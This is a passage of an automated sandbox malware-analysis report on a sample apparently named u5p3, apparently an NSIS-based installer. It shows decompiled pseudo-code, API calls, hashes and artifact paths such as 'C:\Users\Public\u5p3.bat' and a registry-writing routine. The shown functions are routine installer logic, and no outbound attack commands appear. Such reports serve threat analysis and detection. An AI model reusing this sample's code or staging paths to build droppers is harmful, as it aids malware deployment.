                                                        0x00000000
                                                        0x00403294
                                                        0x00403166
                                                        0x00403169
                                                        0x0040316e
                                                        0x0040316e
                                                        0x00403178
                                                        0x0040317b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403181
                                                        0x00403181
                                                        0x00403181
                                                        0x00403189
                                                        0x0040318b
                                                        0x0040318b
                                                        0x0040319c
                                                        0x00000000
                                                        0x00000000
                                                        0x004031a2
                                                        0x004031a5
                                                        0x004031ab
                                                        0x004031b1
                                                        0x004031b9
                                                        0x004031bf
                                                        0x004031c4
                                                        0x004031cb
                                                        0x004031ce
                                                        0x00000000
                                                        0x00000000
                                                        0x004031d4
                                                        0x004031da
                                                        0x004031dc
                                                        0x004031e9
                                                        0x004031eb
                                                        0x0040321c
                                                        0x00403222
                                                        0x0040322e
                                                        0x00403233
                                                        0x00403233
                                                        0x00403238
                                                        0x0040326f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040323a
                                                        0x0040323e
                                                        0x00403253
                                                        0x00403256
                                                        0x00403259
                                                        0x0040325f
                                                        0x00403263
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403269
                                                        0x00403245
                                                        0x0040324c
                                                        0x00000000
                                                        0x00000000
                                                        0x0040324e
                                                        0x00000000
                                                        0x0040324e
                                                        0x00403238
                                                        0x00403277
                                                        0x00000000
                                                        0x00403277
                                                        0x00000000
                                                        0x00403181

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CountTick$wsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 551687249-2449383134
                                                        • Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                        • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                                        • Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                        • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040577F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 760 40577f-4057ca CreateDirectoryW 761 4057d0-4057dd GetLastError 760->761 762 4057cc-4057ce 760->762 763 4057f7-4057f9 761->763 764 4057df-4057f3 SetFileSecurityW 761->764 762->763 764->762 765 4057f5 GetLastError 764->765 765->763
                                                        C-Code - Quality: 100%
                                                        			E0040577F(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f0;
				_v36.Group = 0x4083f0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                        0x0040578a
                                                        0x0040578e
                                                        0x00405791
                                                        0x00405797
                                                        0x0040579b
                                                        0x0040579f
                                                        0x004057a7
                                                        0x004057ae
                                                        0x004057b4
                                                        0x004057bb
                                                        0x004057c2
                                                        0x004057ca
                                                        0x004057cc
                                                        0x00000000
                                                        0x004057cc
                                                        0x004057d6
                                                        0x004057dd
                                                        0x004057f3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004057f5
                                                        0x004057f9

                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                        • GetLastError.KERNEL32 ref: 004057D6
                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                                        • GetLastError.KERNEL32 ref: 004057F5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                        • String ID: C:\Users\Public
                                                        • API String ID: 3449924974-2272764151
                                                        • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                        • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                                        • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                        • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405D6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 766 405d6d-405d79 767 405d7a-405dae GetTickCount GetTempFileNameW 766->767 768 405db0-405db2 767->768 769 405dbd-405dbf 767->769 768->767 771 405db4 768->771 770 405db7-405dba 769->770 771->770
                                                        C-Code - Quality: 100%
                                                        			E00405D6D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a55c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                        0x00405d73
                                                        0x00405d79
                                                        0x00405d7a
                                                        0x00405d7a
                                                        0x00405d7f
                                                        0x00405d80
                                                        0x00405d83
                                                        0x00405d88
                                                        0x00405d8b
                                                        0x00405d95
                                                        0x00405da2
                                                        0x00405da6
                                                        0x00405dae
                                                        0x00000000
                                                        0x00000000
                                                        0x00405db2
                                                        0x00000000
                                                        0x00405db4
                                                        0x00405db4
                                                        0x00405db4
                                                        0x00405db7
                                                        0x00405dba
                                                        0x00405dba
                                                        0x00405dbd
                                                        0x00000000

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00405D8B
                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\Public\u5p3.bat" ,0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7476FAA0,00403589), ref: 00405DA6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: "C:\Users\Public\u5p3.bat" $C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-2833201743
                                                        • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                        • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                                        • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                        • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 772 10001759-10001795 call 10001b18 776 100018a6-100018a8 772->776 777 1000179b-1000179f 772->777 778 100017a1-100017a7 call 10002286 777->778 779 100017a8-100017b5 call 100022d0 777->779 778->779 784 100017e5-100017ec 779->784 785 100017b7-100017bc 779->785 786 1000180c-10001810 784->786 787 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 784->787 788 100017d7-100017da 785->788 789 100017be-100017bf 785->789 793 10001812-1000184c call 100015b4 call 100024a4 786->793 794 1000184e-10001854 call 100024a4 786->794 810 10001855-10001859 787->810 788->784 795 100017dc-100017dd call 10002b57 788->795 791 100017c1-100017c2 789->791 792 100017c7-100017c8 call 1000289c 789->792 798 100017c4-100017c5 791->798 799 100017cf-100017d5 call 10002640 791->799 806 100017cd 792->806 793->810 794->810 803 100017e2 795->803 798->784 798->792 809 100017e4 799->809 803->809 806->803 809->784 814 10001896-1000189d 810->814 815 1000185b-10001869 call 10002467 810->815 814->776 820 1000189f-100018a0 GlobalFree 814->820 822 10001881-10001888 815->822 823 1000186b-1000186e 815->823 820->776 822->814 825 1000188a-10001895 call 1000153d 822->825 823->822 824 10001870-10001878 823->824 824->822 826 1000187a-1000187b FreeLibrary 824->826 825->814 826->822
                                                        C-Code - Quality: 92%
                                                        			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A4(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A4(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A4(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E10002467(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B57(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000289C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002640(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                                        0x10001759
                                                        0x10001759
                                                        0x10001759
                                                        0x10001763
                                                        0x1000176b
                                                        0x10001778
                                                        0x10001786
                                                        0x10001789
                                                        0x1000178b
                                                        0x10001790
                                                        0x10001795
                                                        0x100018a8
                                                        0x100018a8
                                                        0x1000179b
                                                        0x1000179f
                                                        0x100017a2
                                                        0x100017a7
                                                        0x100017a8
                                                        0x100017a9
                                                        0x100017af
                                                        0x100017b5
                                                        0x100017e5
                                                        0x100017ec
                                                        0x10001810
                                                        0x1000184f
                                                        0x10001812
                                                        0x10001812
                                                        0x10001813
                                                        0x10001816
                                                        0x1000181c
                                                        0x10001820
                                                        0x10001823
                                                        0x10001828
                                                        0x10001828
                                                        0x1000182f
                                                        0x10001835
                                                        0x1000183b
                                                        0x10001847
                                                        0x10001848
                                                        0x1000184b
                                                        0x100017ee
                                                        0x100017ef
                                                        0x10001804
                                                        0x10001804
                                                        0x10001859
                                                        0x1000185c
                                                        0x10001869
                                                        0x10001870
                                                        0x10001878
                                                        0x1000187b
                                                        0x1000187b
                                                        0x10001878
                                                        0x10001888
                                                        0x10001890
                                                        0x10001895
                                                        0x10001888
                                                        0x1000189d
                                                        0x00000000
                                                        0x1000189f
                                                        0x00000000
                                                        0x100018a0
                                                        0x1000189d
                                                        0x100017b9
                                                        0x100017bc
                                                        0x100017da
                                                        0x00000000
                                                        0x00000000
                                                        0x100017dd
                                                        0x100017e2
                                                        0x100017e2
                                                        0x100017e4
                                                        0x00000000
                                                        0x100017e4
                                                        0x100017be
                                                        0x100017bf
                                                        0x100017c7
                                                        0x100017c8
                                                        0x00000000
                                                        0x100017c8
                                                        0x100017c1
                                                        0x100017c2
                                                        0x100017d0
                                                        0x00000000
                                                        0x100017d0
                                                        0x100017c5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x100017c5

                                                        APIs
                                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D83
                                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D88
                                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D8D
                                                        • GlobalFree.KERNEL32 ref: 10001804
                                                        • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                        • GlobalFree.KERNEL32 ref: 100018A0
                                                          • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                          • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                          • Part of subcall function 100015B4: lstrcpyW.KERNEL32 ref: 100015CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.841534468.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.841525683.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841545533.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841553679.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc$Librarylstrcpy
                                                        • String ID:
                                                        • API String ID: 1791698881-3916222277
                                                        • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                        • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                        • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                        • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 83%
                                                        			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x18));
				_t34 = __eax;
				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
				 *(_t39 - 0x3c) = E00402C37(2);
				_t20 = E00402C37(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402C37(0x23);
						_t24 = lstrlenW(0x40b5a8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5a8 = E00402C15(3);
						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5a8, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5a8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
				return 0;
			}













                                                        0x004023de
                                                        0x004023de
                                                        0x004023de
                                                        0x004023e1
                                                        0x004023e8
                                                        0x004023f2
                                                        0x004023f5
                                                        0x004023fe
                                                        0x00402405
                                                        0x0040240c
                                                        0x0040240f
                                                        0x00402415
                                                        0x0040241f
                                                        0x00402423
                                                        0x0040242e
                                                        0x0040242e
                                                        0x00402435
                                                        0x0040243f
                                                        0x00402445
                                                        0x00402448
                                                        0x00402448
                                                        0x0040244c
                                                        0x00402458
                                                        0x00402458
                                                        0x00402469
                                                        0x00402471
                                                        0x00402473
                                                        0x00402473
                                                        0x00402476
                                                        0x00402551
                                                        0x00402551
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • lstrlenW.KERNEL32(Finishs,00000023,00000011,00000002), ref: 00402429
                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,Finishs,00000000,00000011,00000002), ref: 00402469
                                                        • RegCloseKey.KERNELBASE(?,?,?,Finishs,00000000,00000011,00000002), ref: 00402551
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CloseValuelstrlen
                                                        • String ID: Finishs
                                                        • API String ID: 2655323295-3355420458
                                                        • Opcode ID: f9d37ecf99ac56edafcaa2f1cd47f4937662206fa3ab36d745cd74ad20f42250
                                                        • Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
                                                        • Opcode Fuzzy Hash: f9d37ecf99ac56edafcaa2f1cd47f4937662206fa3ab36d745cd74ad20f42250
                                                        • Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 1000289C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNELBASE(00000000), ref: 1000295B
                                                        • GetLastError.KERNEL32 ref: 10002A62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.841534468.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.841525683.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841545533.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841553679.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CreateErrorFileLast
                                                        • String ID: @Mqt
                                                        • API String ID: 1214770103-2740872224
                                                        • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                        • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                        • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                        • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C37(0xfffffff0);
				_t17 = E00405BC8(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405B4A(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E004057FC( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E00405819(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E0040577F( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624C(L"C:\\Users\\jones\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                        0x004015c1
